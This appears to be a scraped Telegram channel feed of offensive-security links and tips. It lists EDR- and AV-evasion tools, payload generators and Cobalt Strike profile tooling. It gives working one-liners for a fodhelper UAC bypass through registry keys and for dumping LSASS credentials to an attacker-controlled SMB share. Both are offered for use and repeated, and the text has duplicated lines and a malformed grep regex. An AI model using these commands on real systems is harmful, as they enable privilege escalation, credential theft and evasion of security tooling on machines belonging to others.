GitHub - optiv/ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.
https://github.com/optiv/ScareCrow
https://github.com/optiv/ScareCrow
GitHub
GitHub - optiv/ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.
ScareCrow - Payload creation framework designed around EDR bypass. - optiv/ScareCrow
GitHub - Porchetta-Industries/pyMalleableC2: Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and modify them programmatically.
https://github.com/Porchetta-Industries/pyMalleableC2
https://github.com/Porchetta-Industries/pyMalleableC2
GitHub
GitHub - byt3bl33d3r/pyMalleableC2: Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and…
Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and modify them programmatically. - byt3bl33d3r/pyMalleableC2
UAC bypass in 2 lines:
cmd -> fodhelper
PoC||GTFO
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
cmd -> fodhelper
PoC||GTFO
Get #Admin #rights #windows10, 1 string
powershell:
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force;New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force;fodhelper
powershell:
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force;New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force;fodhelper
BetterXencrypt: Powershell runtime crypter designed to evade AVs
https://securityonline.info/betterxencrypt-powershell-runtime-crypter-designed-to-evade-avs/
https://securityonline.info/betterxencrypt-powershell-runtime-crypter-designed-to-evade-avs/
Cybersecurity News
BetterXencrypt: Powershell runtime crypter designed to evade AVs
BetterXencrypt is a better version of Xencrypt.Xencrypt itself is a Powershell runtime crypter designed to evade AVs. cause Xencrypt is not FUD
Extract all endpoints from a JS File with this oneliner:)
cat files.txt | grep -aoP "(?<=(\"|\'|
cat files.txt | grep -aoP "(?<=(\"|\'|
))\/[a-zA-Z0-9?&=\/-#.](?=(\"|\'|))" | sort -u | tee output.txtGitHub - GetRektBoy724/MeterPwrShell: Automated Tool That Generate The Perfect Powershell Payload
https://github.com/GetRektBoy724/MeterPwrShell#installation
https://github.com/GetRektBoy724/MeterPwrShell#installation
GitHub
GitHub - GetRektBoy724/MeterPwrShell: Automated Tool That Generates The Perfect Meterpreter Powershell Payload
Automated Tool That Generates The Perfect Meterpreter Powershell Payload - GetRektBoy724/MeterPwrShell
Remote LSASS dump without touching local disk? Yes :)
On target run:
1) net use x: \\smbserver_under_your_control\c$\
2) powershell -c rundll32.exe C:\windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id x:\lassdump.bin full
On target run:
1) net use x: \\smbserver_under_your_control\c$\
2) powershell -c rundll32.exe C:\windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id x:\lassdump.bin full
This media is not supported in your browser
VIEW IN TELEGRAM
Our latest blog post explores vulnerabilities and possible Apple copyright violations in Cellebrite's software:
"Exploiting vulnerabilities in Cellebrite UFED and Physical Analyzer from an app's perspective"
-signal
"Exploiting vulnerabilities in Cellebrite UFED and Physical Analyzer from an app's perspective"
-signal
GitHub - lennartkoopmann/nzyme: Nzyme is a free and open next-generation WiFi defense system. Go to www.nzyme.org for more information.
https://github.com/lennartkoopmann/nzyme#getting-started
https://github.com/lennartkoopmann/nzyme#getting-started
GitHub
GitHub - nzymedefense/nzyme: CLOSE ACCESS DENIAL.
CLOSE ACCESS DENIAL. Contribute to nzymedefense/nzyme development by creating an account on GitHub.